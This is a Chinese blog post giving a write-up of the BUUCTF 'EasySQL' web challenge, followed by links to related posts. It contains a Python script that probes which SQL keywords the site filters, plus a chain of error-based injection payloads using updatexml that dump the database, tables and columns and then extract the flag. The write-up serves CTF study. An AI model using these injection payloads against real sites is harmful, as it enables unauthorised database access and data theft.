BUUCTF WEB EASYSQL

最新推荐文章于 2024-06-29 10:30:40 发布
最新推荐文章于 2024-06-29 10:30:40 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/123401828
版权

sql注入题
看到login和register的双逻辑,本能反应往着二次注入里想,属于是条件反射了
现在register.php写个小脚本测试一下关键字

import requests
import time
sql_char = ['select',
			'union',
			'and',
			'or',
			'sleep',
			'where',
			'from',
			'limit',
			'group',
			'by',
			'like',
			'prepare',
			'as',
			'if',
			'char',
			'ascii',
			'mid',
			'left',
			'right',
			'substring',
			'handler',
			'updatexml',
			'extractvalue',
			'benchmark',
			'insert',
			'update',
			'all',
			'@',
			'#',
			'^',
			'&',
			'*',
			'\'',
			'"',
			'~',
			'`',
			'(',
			')',
			'--',
			'=',
			'/',
			'\\',
			' ']
url='http://9e3b9bbd-4087-4cbb-b901-257d3ae4fd47.node4.buuoj.cn:81/register.php'
for char in sql_char:
	payload = 'zhaoxian' + char
	data = {'username': payload, 'password': 'zhaoxian', 'email': 'zhaoxian'}
	response = requests.post(url=url, data=data)
	time.sleep(1)
	if 'invalid string' in response.text:
		print(char+" is illgeal")

过滤了还不少,比较无语的是你需要用户的email,你还把@给禁用了,多少沾点无理取闹了
ok,先随便注册一个账号,登录,四个超链接,点进去看看,后三个都是固定页面,没啥好看的,点进个人信息,看见有个changepassword,这是又一个与sql交互的地方
进行测试,之前过滤的字符在这里都是随便输入,且没有回显,失败了,然后又想二次注入,注册的时候带点没被过滤的特殊字符进来,会不会在changepassword里进行回显呢
照着这个思路,注册用户zhaoxian""",zhaoxian"之前我用过了
changepassword回显成功报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“zhaoxian”""" and pwd=‘3f84f070dd997dc077ab039697ecaf36’’ at line 1
用户名双引号闭合,密码单引号闭合,过滤字也知道了,干就完了,鉴于有明显的回显,而报错注入的函数有没有被禁用,考虑报错注入
and 和or被禁用了,但是&和|并没有被禁用
空格可以用经典的()代替
不写脚本了,直接手动注入
数据库payload
zhaoxian"||updatexml(1,concat(0x3a,(select(database())),0x3a),1)#
注入要在登录界面注,抓包就看到了,changpassword界面不传username
成功回显:XPATH syntax error: ‘:web_sqli:’
下面就是老套路
爆表名
wangxiang"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
回显
XPATH syntax error: ‘:article,flag,users’
爆列名
wangxiang"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())&&(table_name=‘flag’))),1))#
爆flag:
wangxiang"||(updatexml(1,concat(0x3a,(select(flag)from(flag)),0x3a),1))#
XPATH syntax error: ‘:RCTF{Good job! But flag not her’
真的太坏了,不过离拿到flag也不远了
干就完了,查找flag关键字
wangxiang"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(column_name)regexp(‘flag’)),0x3a),1))#
XPATH syntax error: ‘:FLAGS,FLAGS,FLAGS,flag,real_fla’
有了开头就好过多了,这题是真的坏
wangxiang"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(column_name)regexp(’^real_fla’)),0x3a),1))#
XPATH syntax error: ‘:real_flag_1s_here:’
后面判断这个列在哪个表中,就自己写sql语句吧,偷个懒,在users里
wangxiang"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)),0x3a),1))#
回显XPATH syntax error: ‘:xxx,xxx,xxx,xxx,xxx,xxx,xxx,xxx’
不得不说这题真是坏透了,继续正则
wangxiang"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(’^flag’)),0x3a),1))#
拿到一半flag
后面一般用reverse函数倒序输出或者substr去截取
wangxiang"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(’^flag’))),0x3a),1))#
XPATH syntax error: ‘:}e70706187884-586b-1234-c715-0d’
两个拼一下,得到flag
参考视频链接:https://www.bilibili.com/video/BV1za411b7tW/

显哥无敌
关注
专栏目录
BUUCTF_WEBEasySQL1
qq_45766280的博客
05-07 431
先上图 先试试 无论输入什么数字都显示一样的结果 输入flag等特殊查询语句显示 其他的则不显示任何信息 尝试一下堆叠查询,输入: 1;show databases; 试了试联合查询,输出NONONO 查一下表 1; show tables; 好了明白了,flag应该就在当前表中,但所有有关Flag表的查询都被过滤掉了。 查看了别人的wp后才明白原理。 后端代码大致如下 select $_GET['query'] || flag from flag 在这个语句中起到过滤作用的是 || 这个的
Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结(1)
2401_84281594的博客
04-28 745
(但是在本题中有两个变量,这个方法不太适用)
BUUCTFWebEasySQL
qq_70434663的博客
03-05 502
进入靶场后,
Buuctf-Web-[极客大挑战 2019]EasySQL1 解题过程和思路
最新发布
gjpqwertty的博客
06-29 1139
SQL注入挑战题,目标是通过构造恶意的SQL语句来绕过身份验证或获取数据库中的敏感信息。
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1402
又是一道考察sql注入的题。
BUUCTF web-[SUCTF 2019]EasySQL
m0_53314778的博客
01-16 529
[SUCTF 2019]EasySQL 输入 show tables# 爆表我们发现了Flag表 1;show columns from Flag;# 查询Flag表的内容 不给我们查,应该是过滤了某些关键字。 我再试了试order by 联合联合查询,依然是返回NO,没辙,学习开始: 这题关键:要想办法让 ||不是逻辑或 解法一: 直接输入 **,1就可的flag 题解: 内置的sql语句为: sql=“select”.post[‘query’]."||flag from Flag"; 如果$post
buuctf web easysql
03-16
EasySQL 是一种 SQL 注入漏洞,它是由于网站程序对用户输入数据缺乏有效验证导致的。通过提交包含特殊字符的数据,攻击者可以绕过程序的验证机制,直接执行任意的 SQL 指令。这样就可以访问或修改数据库中的数据,...
buuctf easysql
hintll的博客
05-31 1645
[极客大挑战 2019]EasySQL 今天开始做buuctf上的web题 先看这题 打开链接后是一个登陆界面 首先想到的是弱口令试一下 admin admin admin 123 …… 都不行 然后考虑用bp爆破一下试试 但是这里有两个爆破的位置,所需要的时间比较长 所以应该不大概率的会是爆破 那么就只能考虑sql注入 对于有username和password的注入口 一般情况是在第一个username的地方注入然后将后面的password用#注释掉 先用普通的万能sql语句试一下 斜体样式 结果就直接
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 912
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTFWeb题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
Buuctf-Web-[极客大挑战 2019]EasySQL
御七彩虹猫
05-12 260
Buuctf-Web-[极客大挑战 2019]EasySQL
BUUCTF Web[极客大挑战2019] EasySQL
qq_36348811的博客
03-28 331
问题分析 题目类型是Web类型,而且是一个登录页面,首先考虑是否是SQL注入。 先尝试闭合方式,输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。 根据报错信息,尝试注入,在此之前了解一下万能用户名和万能密码。 补充知识 所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。 最常用的管理员用户名:admin root user test guest select * from table_na
BUUCTF:Web-[极客大挑战 2019]EasySQL
wdnmddbl的博客
06-08 530
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
BUUCTF web EasySQL (sql_mode)
H4ppyD0g的博客
02-23 489
检查源码,就是一个post表单,赋值给query变量,然后提交。 既然题目说是sql题目,那就测试吧。 输入数字会显示1,输入字母没反应,输入双引号提示非法。这我就不会了,继续看wp 说是源码泄露在github https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql 过滤了很多 "prepare|flag|unhex|xml|...
buuctf(EasySQL)
qq_75005708的博客
04-12 255
发现过滤了flag,看了其它的wp,这道题是内部查询语句,想让||不是逻辑或,用sql_mode去转换它,设置。sql_mode它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查。还有就是这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个。然后我们接着查 1;回显为1,我们接着查看表 1;2.我们查看数据库 1;0就没有什么回显,然后我们去看看源代码。也只有看出post,其它也没有什么。回显是1,我们再看看0。然后我们先输入1看看。
buuctfEasySQL
qq_38634097的博客
04-18 906
pyload:1’ or1=1 # (#的意思是把后面的注释掉,在这里是注释到闭合的‘,保证语句正常执行)页面报错,说明为字符型,在构造pyload时候,需要主要闭合‘。用or是因为1=1为真,则该语句执行结果为真。1、手工判断注入类型。输入1’判断注入类型,2、构造pyload。
BUUCTF-EasySQL
m0_47571887的博客
11-04 605
这是一道蛮基础的sql注入的题,打开题目 一个具有黑客色彩的登陆页面,emm,没有注册窗口,在用户名或密码处加个单引号发现报错。 判断是字符型注入,通过万能密码登陆注入进去, username=admin' or 1=1 --+&password=' 拿到flag ...
buuctf-web-[极客大挑战 2019]EasySQL
weixin_43345082的博客
06-17 863
sqlmap一把梭 直接用 payload
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值